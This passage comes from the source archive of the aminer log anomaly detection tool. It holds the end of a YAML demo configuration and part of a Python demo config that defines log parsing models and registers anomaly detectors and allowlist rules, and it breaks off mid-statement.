DecimalIntegerValueModelElement name: 'ouid' - id: ogid_string type: FixedDataModelElement name: 'ogid_string' args: ' ogid=' - id: ogid type: DecimalIntegerValueModelElement name: 'ogid' - id: rdev_string type: FixedDataModelElement name: 'rdev_string' args: ' rdev=' - id: rdev type: DelimitedDataModelElement name: 'rdev' delimiter: ' ' - id: nametype_string type: FixedDataModelElement name: 'nametype_string' args: ' nametype=' - id: nametype type: FixedWordlistDataModelElement name: 'nametype' args: - 'NORMAL' - 'ERROR' - id: path type: SequenceModelElement name: 'path' args: - typePath - msgAudit - msg - placeholder - id - item_string - item - name_string - name - inode_string - inode - dev_string - dev - mode_string - mode - ouid_string - ouid - ogid_string - ogid - rdev_string - rdev - nametype_string - nametype - id: typeSyscall type: FixedDataModelElement name: 'type' args: 'type=SYSCALL ' - id: arch_string type: FixedDataModelElement name: 'arch_string' args: '): arch=' - id: arch type: DelimitedDataModelElement name: 'arch' delimiter: ' ' - id: syscall_string type: FixedDataModelElement name: 'syscall_string' args: ' syscall=' - id: syscall1 type: DecimalIntegerValueModelElement name: 'syscall' - id: success_string type: FixedDataModelElement name: 'success_string' args: ' success=' - id: success type: FixedWordlistDataModelElement name: 'success' args: - 'yes' - 'no' - id: exit_string type: FixedDataModelElement name: 'exit_string' args: ' exit=' - id: exit type: DecimalIntegerValueModelElement name: 'exit' - id: remainding_data type: AnyByteDataModelElement name: 'remainding_data' - id: syscall type: SequenceModelElement name: 'syscall' args: - typeSyscall - msgAudit - msg - placeholder - id - arch_string - arch - syscall_string - syscall1 - success_string - success - exit_string - exit - remainding_data - id: dateTimeModelElement type: DateTimeModelElement name: 'DateTimeModelElement' date_format: 'Current DateTime: %d.%m.%Y %H:%M:%S' time_zone: 'UTC' - id: decimalFloatValueModelElement type: DecimalFloatValueModelElement name: 'DecimalFloatValueModelElement' value_sign_type: 'optional' - id: decimalIntegerValueModelElement type: DecimalIntegerValueModelElement name: 'DecimalIntegerValueModelElement' value_sign_type: 'optional' value_pad_type: 'blank' - id: delimitedDataModelElement type: DelimitedDataModelElement name: 'DelimitedDataModelElement' delimiter: ';' - id: fixedDataModelElement1 type: FixedDataModelElement name: 'FixedDataModelElement' args: ';' - id: se type: SequenceModelElement name: 'se' args: - delimitedDataModelElement - fixedDataModelElement1 - id: fixed1 type: FixedDataModelElement name: 'fixed1' args: 'match ' - id: fixed2 type: FixedDataModelElement name: 'fixed2' args: 'fixed String' - id: wordlist type: FixedWordlistDataModelElement name: 'wordlist' args: - 'data: ' - 'string: ' - id: decimal type: DecimalIntegerValueModelElement name: 'decimal' - id: seq1 type: SequenceModelElement name: 'seq1' args: - fixed1 - wordlist - id: seq2 type: SequenceModelElement name: 'seq2' args: - fixed1 - wordlist - fixed2 - id: first type: FirstMatchModelElement name: 'first' args: - seq1 - seq2 - id: elementValueBranchModelElement type: ElementValueBranchModelElement name: 'ElementValueBranchModelElement' args: - first - 'wordlist' branch_model_dict: - id: 0 model: decimal - id: 1 model: fixed2 - id: hexStringModelElement type: HexStringModelElement name: 'HexStringModelElement' - id: fixedDataModelElement2 type: FixedDataModelElement name: 'FixedDataModelElement' args: 'Gateway IP-Address: ' - id: ipAddressDataModelElement type: IpAddressDataModelElement name: 'IpAddressDataModelElement' - id: se2 type: SequenceModelElement name: 'se2' args: - fixedDataModelElement2 - ipAddressDataModelElement - id: multiLocaleDateTimeModelElement type: MultiLocaleDateTimeModelElement name: 'MultiLocaleDateTimeModelElement' date_formats: - format: - '%b %d %Y' - null - 'en_US.utf8' - id: fixedDataModelElementDrawnNumber type: FixedDataModelElement name: 'FixedDataModelElement' args: '[drawn number]: ' - id: decimalIntegerValueModelElement1 type: DecimalIntegerValueModelElement name: 'DecimalIntegerValueModelElement' - id: sequenceModelElement type: SequenceModelElement name: 'SequenceModelElement' args: - fixedDataModelElementDrawnNumber - decimalIntegerValueModelElement1 - id: repeatedElementDataModelElement type: RepeatedElementDataModelElement name: 'RepeatedElementDataModelElement' args: - sequenceModelElement - 1 - id: variableByteDataModelElement type: VariableByteDataModelElement name: 'VariableByteDataModelElement' args: '-@#' - id: whiteSpaceLimitedDataModelElement type: WhiteSpaceLimitedDataModelElement name: 'WhiteSpaceLimitedDataModelElement' - id: fixed type: FixedDataModelElement name: 'fixed' args: ' ' - id: se3 type: SequenceModelElement name: 'se3' args: - whiteSpaceLimitedDataModelElement - fixed - id: base64StringModelElement type: Base64StringModelElement name: 'Base64StringModelElement' - id: fixed3 type: FixedDataModelElement name: 'FixedDataModelElement' args: 'The-searched-element-was-found!' - id: fixedDME type: FixedDataModelElement name: 'fixedDME' args: 'Any:' - id: any type: AnyByteDataModelElement name: 'AnyByteDataModelElement' - id: seq4 type: SequenceModelElement name: 'se4' args: - fixedDME - any - id: firstMatchModelElement type: FirstMatchModelElement name: 'FirstMatchModelElement//optional' args: - fixed3 - seq4 - id: optionalMatchModelElement type: OptionalMatchModelElement name: '/' args: firstMatchModelElement - id: g type: FixedDataModelElement name: 'g' args: 'g' - id: h type: FixedDataModelElement name: 'h' args: 'h' - id: i type: FixedDataModelElement name: 'i' args: 'i' - id: j type: FixedDataModelElement name: 'j' args: 'j' - id: k type: FixedDataModelElement name: 'k' args: 'k' - id: l type: FixedDataModelElement name: 'l' args: 'l' - id: cronAnnouncement type: SequenceModelElement name: 'CronAnnouncement' args: - dtm - fixedSpace - uName - cron - jobNumber - run - cronType - startTime - id: cronExecution type: SequenceModelElement name: 'CronExecution' args: - dtm - emptySpace1 - uName - cron - jobNumber - job - cronType - started - id: dailyCron type: SequenceModelElement name: 'DailyCron' args: - dtm - uNameSpace1 - uName - uNameSpace2 - delimitedUser - cron - jobNumber - details - id: diskReport type: SequenceModelElement name: 'DiskReport' args: - space - data - rest - id: loginDetails type: SequenceModelElement name: 'LoginDetails' args: - userLoginDetails - username - status - pastTime - id: randomTime type: SequenceModelElement name: 'RandomTime' args: - spaceRandom - random - id: sensors type: SequenceModelElement name: 'Sensors' args: - cpuTemp - space1 - cpuWorkload - space2 - dtm - id: ipAddresses type: SequenceModelElement name: 'IPAddresses' args: - userIpAddress - username - action - ip - id: type type: FirstMatchModelElement name: 'type' args: - path - syscall - id: ecd type: FirstMatchModelElement name: 'ECD' args: - g - h - i - j - k - l - id: parsingME type: FirstMatchModelElement name: 'ParsingME' args: - dateTimeModelElement - decimalFloatValueModelElement - decimalIntegerValueModelElement - se - elementValueBranchModelElement - hexStringModelElement - se2 - multiLocaleDateTimeModelElement - repeatedElementDataModelElement - variableByteDataModelElement - se3 - base64StringModelElement - optionalMatchModelElement - id: model start: True type: FirstMatchModelElement name: 'model' args: - cronAnnouncement - cronExecution - dailyCron - diskReport - loginDetails - random - randomTime - sensors - ipAddresses - type - ecd - parsingME Input: timestamp_paths: ["/model/DailyCron/DTM"] adjust_timestamps: True use_real_time: True Analysis: - type: TimestampsUnsortedDetector id: TimestampsUnsortedDetector - type: PathExistsMatchRule id: path_exists_match_rule1 path: "/model/LoginDetails/PastTime/Time/Minutes" - type: DebugMatchRule id: debug_match_rule debug_mode: True - type: PathExistsMatchRule id: path_exists_match_rule2 path: "/model/LoginDetails" - type: ValueMatchRule id: value_match_rule path: "/model/LoginDetails/Username" value: "root" - type: NegationMatchRule id: negation_match_rule1 sub_rule: "value_match_rule" - type: NegationMatchRule id: negation_match_rule2 sub_rule: "path_exists_match_rule2" - type: AndMatchRule id: and_match_rule1 sub_rules: - "path_exists_match_rule1" - "negation_match_rule1" - "debug_match_rule" - type: AndMatchRule id: and_match_rule2 sub_rules: - "negation_match_rule1" - "path_exists_match_rule2" - "debug_match_rule" - type: OrMatchRule id: or_match_rule sub_rules: - "and_match_rule1" - "and_match_rule2" - "negation_match_rule2" - type: AllowlistViolationDetector id: Allowlist allowlist_rules: - "or_match_rule" - type: ParserCount id: ParserCount report_interval: 10 - type: EventTypeDetector id: EventTypeDetector - type: VariableTypeDetector id: VariableTypeDetector event_type_detector: EventTypeDetector silence_output_except_indicator: False output_logline: False ignore_list: - "/model/RandomTime" - type: VariableCorrelationDetector id: VariableCorrelationDetector event_type_detector: EventTypeDetector ignore_list: - "/model/RandomTime" - type: TSAArimaDetector id: TSAArimaDetector event_type_detector: EventTypeDetector - type: EventCorrelationDetector id: EventCorrelationDetector check_rules_flag: True hypothesis_max_delta_time: 1.0 learn_mode: True - type: EventFrequencyDetector id: EventFrequencyDetector window_size: 0.5 - type: EventSequenceDetector id: EventSequenceDetector id_path_list: - '/model/ParsingME' ignore_list: - '/model/ECD/g' - '/model/ECD/h' - '/model/ECD/i' - '/model/ECD/j' - '/model/ECD/k' - '/model/ECD/l' - '/model/Random' - '/model/RandomTime' - '/model/DailyCron' - type: MatchFilter id: MatchFilter paths: - "/model/Random" value_list: - 1 - 10 - 100 - type: EnhancedNewMatchPathValueComboDetector id: EnhancedNewValueCombo paths: - "/model/DailyCron/UName" - "/model/DailyCron/JobNumber" tuple_transformation_function: "demo" learn_mode: True - type: ModuloTimeMatchRule id: "mt" path: "mtmr" seconds_modulo: 3 lower_limit: 0 upper_limit: 3 - type: ValueDependentModuloTimeMatchRule id: "vdmt" path: "vdmtmr" seconds_modulo: 3 paths: - "/model/ECD/g" - "/model/ECD/h" - "/model/ECD/i" - "/model/ECD/j" - "/model/ECD/k" - "/model/ECD/l" limit_lookup_dict: e: - 0 - 2.95 default_limit: - 0 - 3 - type: ValueDependentDelegatedMatchRule id: "value_dependent_delegated_match_rule" paths: - "/model/ECD/g" - "/model/ECD/h" - "/model/ECD/i" - "/model/ECD/j" - "/model/ECD/k" - "/model/ECD/l" rule_lookup_dict: (b"g",): "mt" (b"h",): "mt" (b"i",): "mt" (b"j",): "vdmt" (b"k",): "vdmt" (b"l",): "vdmt" default_rule: "mt" - type: EventGenerationMatchAction id: "ip_match_action" event_type: "Analysis.Rules.IPv4InRFC1918MatchRule" event_message: "Private IP address occurred!" - type: IPv4InRFC1918MatchRule id: "ipv4_in_rfc1918_match_rule" path: "/model/ParsingME/se2/IpAddressDataModelElement" match_action: "ip_match_action" - type: DebugHistoryMatchRule id: "debug_history_match_rule" debug_mode: True - type: ValueListMatchRule id: "value_list_match_rule" path: "/model/ParsingME/se2/IpAddressDataModelElement" value_list: - 134744072 - 134743044 - type: NegationMatchRule id: "negation_list" sub_rule: "value_list_match_rule" - type: ValueRangeMatchRule id: "value_range_match_rule" path: "/model/ParsingME/se2/IpAddressDataModelElement" lower_limit: 167772160 upper_limit: 184549375 - type: NegationMatchRule id: "negation_range" sub_rule: "value_range_match_rule" - type: StringRegexMatchRule id: "string_regex_match_rule" path: "/model/type/syscall/success" regex: "^no$" - type: NegationMatchRule id: "negation_string_regex" sub_rule: "string_regex_match_rule" - type: ParallelMatchRule id: "parallel_match_rule" sub_rules: - "value_dependent_delegated_match_rule" - "ipv4_in_rfc1918_match_rule" - "debug_history_match_rule" - type: AndMatchRule id: "time_and_match_rule" sub_rules: - "parallel_match_rule" - "negation_list" - "negation_range" - "negation_string_regex" - type: AllowlistViolationDetector id: TimeAllowlist allowlist_rules: - "time_and_match_rule" - type: LinearNumericBinDefinition id: linear_numeric_bin_definition lower_limit: 50 bin_size: 5 bin_count: 20 outlier_bins_flag: True - type: ModuloTimeBinDefinition id: modulo_time_bin_definition modulo_value: 86400 time_unit: 3600 lower_limit: 0 bin_size: 1 bin_count: 24 outlier_bins_flag: True - type: HistogramAnalysis id: HistogramAnalysis histogram_defs: [["/model/RandomTime/Random", "linear_numeric_bin_definition"]] report_interval: 10 - type: PathDependentHistogramAnalysis id: PathDependentHistogramAnalysis path: "/model/RandomTime" bin_definition: "modulo_time_bin_definition" report_interval: 10 - type: MatchValueAverageChangeDetector id: MatchValueAverageChange timestamp_path: null paths: - "/model/Random" min_bin_elements: 100 min_bin_time: 10 - type: MatchValueStreamWriter id: MatchValueStreamWriter stream: "sys.stdout" paths: - "/model/Sensors/CPUTemp" - "/model/Sensors/CPUWorkload" - "/model/Sensors/DTM" separator: ";" missing_value_string: "" - type: NewMatchPathValueComboDetector id: NewMatchPathValueCombo paths: - "/model/IPAddresses/Username" - "/model/IPAddresses/IP" learn_mode: True log_resource_ignore_list: - 'file:///tmp/other_syslog' - type: NewMatchIdValueComboDetector id: NewMatchIdValueComboDetector paths: - "/model/type/path/name" - "/model/type/syscall/syscall" id_path_list: - "/model/type/path/id" - "/model/type/syscall/id" min_allowed_time_diff: 5 allow_missing_values: True learn_mode: True - type: NewMatchPathValueDetector id: NewMatchPathValue paths: - "/model/DailyCron/JobNumber" - "/model/IPAddresses/Username" learn_mode: True - type: MissingMatchPathValueDetector id: MissingMatch paths: - "/model/DiskReport/Space" check_interval: 2 realert_interval: 5 learn_mode: True - type: TimeCorrelationDetector id: TimeCorrelationDetector parallel_check_count: 2 min_rule_attributes: 1 max_rule_attributes: 5 record_count_before_event: 10000 - type: CorrelationRule rule_id: correlation_rule min_time_delta: 5 max_time_delta: 6 artefact_match_parameters: [["/model/CronAnnouncement/JobNumber", "/model/CronExecution/JobNumber"]] - type: EventClassSelector action_id: a_class_selector artefact_a_rules: - correlation_rule - type: EventClassSelector action_id: b_class_selector artefact_b_rules: - correlation_rule - type: PathExistsMatchRule id: path_exists_match_rule3 path: "/model/CronAnnouncement/Run" match_action: a_class_selector - type: PathExistsMatchRule id: path_exists_match_rule4 path: "/model/CronExecution/Job" match_action: b_class_selector - type: TimeCorrelationViolationDetector id: TimeCorrelationViolationDetector ruleset: - path_exists_match_rule3 - path_exists_match_rule4 EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminer/jsonConverterHandler-demo-config.py000066400000000000000000000745071500476301700321130ustar00rootroot00000000000000from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement, MultiLocaleDateTimeModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.Base64StringModelElement import Base64StringModelElement from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement from aminer.parsing.HexStringModelElement import HexStringModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.WhiteSpaceLimitedDataModelElement import WhiteSpaceLimitedDataModelElement # This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ date_format_string = b'%Y-%m-%d %H:%M:%S' cron = b' cron[' # Build the parsing model: service_children_disk_report = [ FixedDataModelElement('Space', b' Current Disk Data is: Filesystem Type Size Used Avail Use%'), DelimitedDataModelElement('Data', b'%'), AnyByteDataModelElement('Rest')] service_children_login_details = [ FixedDataModelElement('User/LoginDetails', b'User '), DelimitedDataModelElement('Username', b' '), FixedWordlistDataModelElement('Status', [b' logged in', b' logged out']), OptionalMatchModelElement('PastTime', SequenceModelElement('Time', [ FixedDataModelElement('Blank', b' '), DecimalIntegerValueModelElement('Minutes'), FixedDataModelElement('Ago', b' minutes ago.')]))] service_children_cron_job = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Details', b']: Job `cron.daily` started.')] service_children_random_time = [FixedDataModelElement('Space', b'Random: '), DecimalIntegerValueModelElement('Random')] service_children_sensors = [SequenceModelElement('CPUTemp', [ FixedDataModelElement('FixedTemp', b'CPU Temp: '), DecimalIntegerValueModelElement('Temp'), FixedDataModelElement('Degrees', b'\xc2\xb0C')]), FixedDataModelElement('Space1', b', '), SequenceModelElement('CPUWorkload', [ FixedDataModelElement('FixedWorkload', b'CPU Workload: '), DecimalIntegerValueModelElement('Workload'), FixedDataModelElement('Percent', b'%')]), FixedDataModelElement('Space2', b', '), DateTimeModelElement('DTM', date_format_string)] service_children_user_ip_address = [ FixedDataModelElement('User/UserIPAddress', b'User '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Action', b' changed IP address to '), IpAddressDataModelElement('IP')] service_children_cron_job_announcement = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Run', b']: Will run job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('StartTime', b'\' in 5 min.')] service_children_cron_job_execution = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Job', b']: Job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Started', b'\' started')] service_children_audit = [SequenceModelElement('path', [ FixedDataModelElement('type', b'type=PATH '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('item_string', b'): item='), DecimalIntegerValueModelElement('item'), FixedDataModelElement('name_string', b' name="'), DelimitedDataModelElement('name', b'"'), FixedDataModelElement('inode_string', b'" inode='), DecimalIntegerValueModelElement('inode'), FixedDataModelElement('dev_string', b' dev='), DelimitedDataModelElement('dev', b' '), FixedDataModelElement('mode_string', b' mode='), DecimalIntegerValueModelElement('mode', value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement('ouid_string', b' ouid='), DecimalIntegerValueModelElement('ouid'), FixedDataModelElement('ogid_string', b' ogid='), DecimalIntegerValueModelElement('ogid'), FixedDataModelElement('rdev_string', b' rdev='), DelimitedDataModelElement('rdev', b' '), FixedDataModelElement('nametype_string', b' nametype='), FixedWordlistDataModelElement('nametype', [b'NORMAL', b'ERROR'])]), SequenceModelElement('syscall', [ FixedDataModelElement('type', b'type=SYSCALL '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('arch_string', b'): arch='), DelimitedDataModelElement('arch', b' '), FixedDataModelElement('syscall_string', b' syscall='), DecimalIntegerValueModelElement('syscall'), FixedDataModelElement('success_string', b' success='), FixedWordlistDataModelElement('success', [b'yes', b'no']), FixedDataModelElement('exit_string', b' exit='), DecimalIntegerValueModelElement('exit'), AnyByteDataModelElement('remainding_data')])] service_children_parsing_model_element = [ DateTimeModelElement('DateTimeModelElement', b'Current DateTime: %d.%m.%Y %H:%M:%S'), DecimalFloatValueModelElement('DecimalFloatValueModelElement', value_sign_type='optional'), DecimalIntegerValueModelElement('DecimalIntegerValueModelElement', value_sign_type='optional', value_pad_type='blank'), SequenceModelElement('se', [ DelimitedDataModelElement('DelimitedDataModelElement', b';'), FixedDataModelElement('FixedDataModelElement', b';')])] # ElementValueBranchModelElement fixed_data_me1 = FixedDataModelElement("fixed1", b'match ') fixed_data_me2 = FixedDataModelElement("fixed2", b'fixed String') fixed_wordlist_data_model_element = FixedWordlistDataModelElement("wordlist", [b'data: ', b'string: ']) decimal_integer_value_model_element = DecimalIntegerValueModelElement("decimal") service_children_parsing_model_element.append( ElementValueBranchModelElement('ElementValueBranchModelElement', FirstMatchModelElement("first", [ SequenceModelElement("seq1", [fixed_data_me1, fixed_wordlist_data_model_element]), SequenceModelElement("seq2", [fixed_data_me1, fixed_wordlist_data_model_element, fixed_data_me2])]), "wordlist", {0: decimal_integer_value_model_element, 1: fixed_data_me2})) service_children_parsing_model_element.append(HexStringModelElement('HexStringModelElement')) service_children_parsing_model_element.append(SequenceModelElement('se2', [ FixedDataModelElement('FixedDataModelElement', b'Gateway IP-Address: '), IpAddressDataModelElement('IpAddressDataModelElement')])) import locale loc = locale.getlocale() if loc == (None, None): loc = ('en_US', 'utf8') service_children_parsing_model_element.append( MultiLocaleDateTimeModelElement('MultiLocaleDateTimeModelElement', [(b'%b %d %Y', None, '%s.%s' % loc)])) service_children_parsing_model_element.append( RepeatedElementDataModelElement('RepeatedElementDataModelElement', SequenceModelElement('SequenceModelElement', [ FixedDataModelElement('FixedDataModelElement', b'[drawn number]: '), DecimalIntegerValueModelElement('DecimalIntegerValueModelElement')]), 1)) service_children_parsing_model_element.append(VariableByteDataModelElement('VariableByteDataModelElement', b'-@#')) service_children_parsing_model_element.append(SequenceModelElement('se', [ WhiteSpaceLimitedDataModelElement('WhiteSpaceLimitedDataModelElement'), FixedDataModelElement('fixed', b' ')])) # The Base64StringModelElement must be just before the AnyByteDataModelElement to avoid unexpected Matches. service_children_parsing_model_element.append(Base64StringModelElement('Base64StringModelElement')) # The OptionalMatchModelElement must be paired with a FirstMatchModelElement because it accepts all data and thus no data gets # to the AnyByteDataModelElement. The AnyByteDataModelElement must be last, because all bytes are accepted. service_children_parsing_model_element.append( OptionalMatchModelElement('/', FirstMatchModelElement('FirstMatchModelElement//optional', [ FixedDataModelElement('FixedDataModelElement', b'The-searched-element-was-found!'), SequenceModelElement('se', [ FixedDataModelElement('FixedDME', b'Any:'), AnyByteDataModelElement('AnyByteDataModelElement')])]))) alphabet = b'ghijkl' service_children_ecd = [] for _, char in enumerate(alphabet): char = bytes([char]) service_children_ecd.append(FixedDataModelElement(char.decode(), char)) parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('CronAnnouncement', service_children_cron_job_announcement), SequenceModelElement('CronExecution', service_children_cron_job_execution), SequenceModelElement('DailyCron', service_children_cron_job), SequenceModelElement('DiskReport', service_children_disk_report), SequenceModelElement('LoginDetails', service_children_login_details), DecimalIntegerValueModelElement('Random'), SequenceModelElement('RandomTime', service_children_random_time), SequenceModelElement('Sensors', service_children_sensors), SequenceModelElement('IPAddresses', service_children_user_ip_address), FirstMatchModelElement('type', service_children_audit), FirstMatchModelElement('ECD', service_children_ecd), FirstMatchModelElement('ParsingME', service_children_parsing_model_element)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([atom_filter]) analysis_context.register_component(simple_monotonic_timestamp_adjust, component_name="SimpleMonotonicTimestampAdjust") from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.events.JsonConverterHandler import JsonConverterHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) json_converter_handler = JsonConverterHandler([stream_printer_event_handler], analysis_context) anomaly_event_handlers = [json_converter_handler] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [simple_monotonic_timestamp_adjust], anomaly_event_handlers, use_real_time=True) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler, VerboseUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=False) analysis_context.register_component(simple_unparsed_atom_handler, component_name="SimpleUnparsedHandler") verbose_unparsed_atom_handler = VerboseUnparsedAtomHandler(anomaly_event_handlers, parsing_model) atom_filter.add_handler(verbose_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(verbose_unparsed_atom_handler, component_name="VerboseUnparsedHandler") from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector timestamps_unsorted_detector = TimestampsUnsortedDetector(analysis_context.aminer_config, anomaly_event_handlers) atom_filter.add_handler(timestamps_unsorted_detector) analysis_context.register_component(timestamps_unsorted_detector, component_name="TimestampsUnsortedDetector") from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector allowlist_rules = [ Rules.OrMatchRule([ Rules.AndMatchRule([ Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root')), Rules.DebugMatchRule(debug_match_result=True)]), Rules.AndMatchRule([ Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')), Rules.PathExistsMatchRule('/model/LoginDetails'), Rules.DebugMatchRule(debug_match_result=True)]), Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])] # This rule list should trigger, when the line does not look like: User root (logged in, logged out) # or User 'username' (logged in, logged out) x minutes ago. allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers, output_logline=True) analysis_context.register_component(allowlist_violation_detector, component_name="Allowlist") atom_filter.add_handler(allowlist_violation_detector) from aminer.analysis.ParserCount import ParserCount parser_count = ParserCount(analysis_context.aminer_config, None, anomaly_event_handlers, 10) analysis_context.register_component(parser_count, component_name="ParserCount") atom_filter.add_handler(parser_count) from aminer.analysis.EventTypeDetector import EventTypeDetector etd = EventTypeDetector(analysis_context.aminer_config, anomaly_event_handlers) analysis_context.register_component(etd, component_name="EventTypeDetector") atom_filter.add_handler(etd) from aminer.analysis.VariableTypeDetector import VariableTypeDetector vtd = VariableTypeDetector(analysis_context.aminer_config, anomaly_event_handlers, etd, silence_output_except_indicator=False, output_logline=False, ignore_list=["/model/RandomTime"]) analysis_context.register_component(vtd, component_name="VariableTypeDetector") atom_filter.add_handler(vtd) from aminer.analysis.VariableCorrelationDetector import VariableCorrelationDetector vtd = VariableCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, etd, disc_div_thres=0.5, ignore_list=["/model/RandomTime"]) analysis_context.register_component(vtd, component_name="VariableCorrelationDetector") atom_filter.add_handler(vtd) from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector ecd = EventCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, check_rules_flag=True, hypothesis_max_delta_time=1.0) analysis_context.register_component(ecd, component_name="EventCorrelationDetector") atom_filter.add_handler(ecd) from aminer.analysis.EventFrequencyDetector import EventFrequencyDetector efd = EventFrequencyDetector(analysis_context.aminer_config, anomaly_event_handlers, window_size=0.1) analysis_context.register_component(efd, component_name="EventFrequencyDetector") atom_filter.add_handler(efd) from 